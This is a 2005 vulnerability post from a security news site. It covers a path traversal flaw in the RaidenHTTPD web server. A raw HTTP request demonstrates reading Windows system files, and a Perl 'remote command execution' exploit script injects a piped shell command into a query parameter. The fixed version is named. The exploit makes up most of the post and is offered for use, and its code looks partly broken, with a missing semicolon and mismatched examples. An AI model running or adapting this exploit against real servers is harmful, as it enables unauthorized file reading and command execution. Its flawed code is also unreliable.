Main Menu
Network
Sponsor
Top 10 Sites
Partners
|
|
Top Submit newsSubscribe 
Communication | Computer Crime | Digital Audio, Video, Photo | General News | Hardware | Internet | Mobile | PDA | Security | Software | Vulnerability |
Previous articleBack to news listNext article
| Sponsored links | Want to become one of our authors and see your work published on ALLSeek.iNFO ?
| | RaidenHTTPD Remote command execution exploit |
|---|
Categorie: Vulnerability
Posted: 2005-03-05 by basher13
Views: 485
| Current Rating: Not rated
|
| | Details |
|---|
Update:
4:21 AM 3/6/2005
Subject:
" RaidenHTTPD Remote command execution exploit "
Description:
RaidenHTTPD is a full featured web server software for Windows 98/Me/
2000/XP/2003 platforms.
Bugs:
The program by default has some checks to avoid malicious patterns
like "/../" into http requests, but the program doesn't well manage
the initial "/" into requests. In fact if you send a request like:
> GET /somefile HTTP/1.1
the webserver will return the requested file if available in the
DocumentRoot directory.
But if you send a request like:
> GET somefile HTTP/1.1
the webserver will return the requested file if available in the
disk partition where the httpd is installed.
Demo:
To test the vulnerability, send a raw http request to the server like:
GET windows/system.ini HTTP/1.1
Host: localhost
this will display Windows' system.ini, if the http server is installed
on the same partition of Windows.
telnet> o
To 127.0.0.1 25
GET windows/system.ini HTTP/1.1
Host: localhost
.
Exploit:
'Changes/modify the line to send a raw http request,eg;
'GET windows/system.ini HTTP/1.1 or GET
'windows/system32/drivers/etc/host.sam ,as you know
'partition of windows.
#!/usr/bin/perl
use IO::Socket;
$banner = "
#################################################################
- Infamous Group -
RaidenHTTPD Remote command execution exploit
Usage:
>perl ./rdHTTPD.pl localhost \"uname -a\"
#################################################################
";
$bug_param = 'configdir';
$id_start = 'b_exp';
$id_exit = 'e_exp';
$id_print = 0;
$http_head = "\n\n";
$win_ini = 'windows/system.ini'
sub Print_Report {
$str = $_[0];
if ($str =~ m/$id_exit/i) {
exit;
}
if ($str =~ m/$id_start/i) {
$str =~ s/$id_start//ig;
$id_print = 1;
}
if ($id_print == 1) {
print "$str";
}
}
sub ConnectServer {
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server",
PeerPort => "80")|| die "Error\n";
print $socket "GET $win_ini".'?'.$bug_param.'='."$expl HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
while ($report = <$socket>) {
&Print_Report("$report");
}
}
print "$banner";
if ($ARGV[0] && $ARGV[1]) {
$server = $ARGV[0];
$cmd = $ARGV[1];
}
else {
exit;
}
$expl = '|echo '.''.';echo '.$id_start.';'.$cmd.';echo '.$id_exit.';%00';
$expl =~ s/\W/"%".sprintf("%x",ord($&))/eg;
&ConnectServer;
Solution:
Bug fixed in the version 1.1.31.
Vendor URL:
http://www.fastream.com
Reported by:
basher13 [at]linuxmail.org
Infamous Group - http://98.to/infamous
| | Syndication |
|---|
Permalink Email this
The URI to TrackBack this entry is:
http://allseek.info/news/trackback.php?id=1409
| | User comments (post your comments ) |
|---|
Only registerd members can post comments and articles
|
| Previous articleBack to news listNext article
|
|
|
|
InterJOB.su
|
